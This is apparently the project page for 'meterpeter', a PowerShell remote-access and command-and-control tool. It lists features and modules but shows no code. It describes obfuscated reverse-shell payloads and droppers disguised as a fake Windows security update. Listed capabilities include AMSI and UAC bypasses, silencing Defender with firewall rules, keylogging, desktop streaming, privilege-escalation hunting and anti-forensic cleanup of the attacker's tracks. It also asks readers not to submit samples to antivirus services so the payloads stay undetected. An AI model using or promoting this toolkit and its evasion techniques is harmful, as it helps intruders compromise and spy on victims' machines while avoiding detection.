meterpeter C2 - v2.10.11 - Sagittarius A*
Quick Jump Links
- Project Home Page (GitHub)
- Install Under Linux Distros
- Install Under Windows Distros
- Project github WiKi Pages (Modules)
- Working with meterpeter dropper(s)
- Special Thanks (Contributions)
Project Description - Sagittarius_A* - Remote Access Tool v2.10.11
This PS1 starts a listener server on a 'Windows|Linux' attacker machine and generates PS reverse tcp shell payloads obfuscated in 'BXOR' with a random secret key
and another layer of Characters/Variables Obfuscation to be executed on target machine. You can also recive the generated reverse tcp shell connection via 'netcat'.
(in that case you will lose C2 functionalities like screenshot, upload, download files, Keylogger, AdvInfo, PostExploit, Escalation-Of-Privileges, Stream Target Desktop,)
Executing the client (payload) with admin privileges, unlocks ALL C2 server modules (AMSI + Execution_Policy bypasses). Droppers mimic a 'fake KB Security Update'
If executed, while in background downloads\executes the client.ps1 in '$Env:TMP' trusted location, with the intent of evading Windows Defender + Exploit Guard.
Remark: Meterpeter payloads | droppers are FUD ( Please dont Test\Send samples to Virus_Total\similar_websites or to $Microsoft Cloud suspicious.amsi samples )
List Of Updated Modules
| Module Name | Issue | Update |
|---|---|---|
| Info | Get more information about target system (UserAccouts,RegisteredUser,BootUpTime,etc) | Automated Internal Function Update |
| Meterpeter C2 Attack Vector | TinyUrl API implementation ( obfuscate the url dropper link ) | Automated Internal Function Update |
| Meterpeter C2 sub-menus | Sub-menus displays redesigned ( more clean console outputs ) | Sub-Menus displays redesigned |
| Advinfo -> PingSweep | Enumerate \ Scan active ip address on Local Lan \ Simple Port Scanner | New Module |
| Advinfo -> GetBrowsers | AMSI string flagging detection on cmdlet auto-download \ execution | AMSI string detection bypass |
| AdvInfo -> FRManager | Silencing microsoft defender using firewall rules (SilenceDefender_ATP.ps1) | New Module |
| AdvInfo -> GeoLocate | Client (payload-target) geo location and public ip address resolver | New Module |
| PostExploit -> Sherlock | Added to PostExploit -> FindEop ( search for escalation of privileges entrys ) | New Module |
| PostExploit -> GetAdmin | Replaced old (CMSTP) AMSI DLL bypass technic by (@Oddvar_Moe) SendKeys | AMSI string detection bypass |
| PostExploit -> Escalate | Post -> Escalate -> CmdLine ( Spawn UAC gui to run cmdline elevated ) | New Module |
| PostExploit -> CleanTracks | LNK artifacts search updated to include even more locations | LNK artifacts search updated |
| PostExploit -> hiddendir | Query \ Create \ Delete super hidden system folders | New Module |
| Dropper Id 2 ( HTA ) | AMSI string flagging detection on hta Build \ Download | AMSI string detection bypass |
| Dropper Id 3 ( EXE ) | Auto-set-PS-execution-policy-to-unrestricted \ Binary.exe suspicious.amsi bypass | Source Code Updated |
Meterpeter v2.10.11 release - Research - $For reverse engineerings$
- Working with meterpeter payload droppers - exec time \ msgboxs
- Enumerate active IP Address in Lan - PingSweep.ps1 simple port scanner
- UAC Bypass POC using SendKeys! (@Oddvar_Moe) - UACBypassCMSTP.ps1 auxiliary module
- Hunting for Escalation Of Privileges possible entrys - @Meterpeter post-exploit findeop.ps1 auxiliary module
- Hunting for Escalation Of Privileges possible entrys - @Meterpeter post-exploit ACLMitreT1574.ps1auxiliary module
meterpeter C2 - v2.10.11 - screenshots
Stream Target Desktop Live
Elevate session from UserLand to Adminstrator
Enumerating remote host installed browsers\versions
Simple ICMP\TCP builtin port scanner
Searching for Escalation Of privileges possible entrys ( Sherlock.ps1 + findEop.bat + ACLMitreT1574.ps1 )
Enumerating remote host running tasks
Cleanning attacker system tracks ( anti-forensic )
